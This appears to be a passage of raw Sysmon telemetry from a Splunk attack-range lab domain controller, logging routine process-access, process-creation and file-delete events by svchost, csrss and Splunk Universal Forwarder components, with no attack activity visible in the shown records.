11:15:19.814{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.814{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.814{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.814{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.814{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1747-6216-2507-000000003802}6528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.814{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1747-6216-2507-000000003802}6528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.816{C8EA50B7-1747-6216-2507-000000003802}6528C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000297253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.599{C8EA50B7-1747-6216-2407-000000003802}21445188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.314{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1747-6216-2407-000000003802}2144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.314{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1747-6216-2407-000000003802}2144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.314{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1747-6216-2407-000000003802}2144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.316{C8EA50B7-1747-6216-2407-000000003802}2144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:19.230{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=021105B7770EB8016F901C14D91F6CD9,SHA256=DA409943607FB6CDF60FE64A54FEB815FA682E9AE31950D01D175C0DBD42DB51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.618{C8EA50B7-1748-6216-2607-000000003802}49606852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.418{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1748-6216-2607-000000003802}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.417{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.416{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1748-6216-2607-000000003802}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.416{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.416{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.416{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.415{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1748-6216-2607-000000003802}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.413{C8EA50B7-1748-6216-2607-000000003802}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000297263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.334{C8EA50B7-1747-6216-2507-000000003802}65286368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.249{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4FB4554749BF3E08DF2BB187BCC7F70,SHA256=94638FFA2ECD761933A6A65E06F5D536231FAE9E220600ADD2AC04A8CA41308D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221130Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:20.002{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1925597B779BC481C13C16EDA1248F44,SHA256=2D0BAEB3A769191DEE4670E907F01016830C89605F9D066F7624F874537DA016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:21.281{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 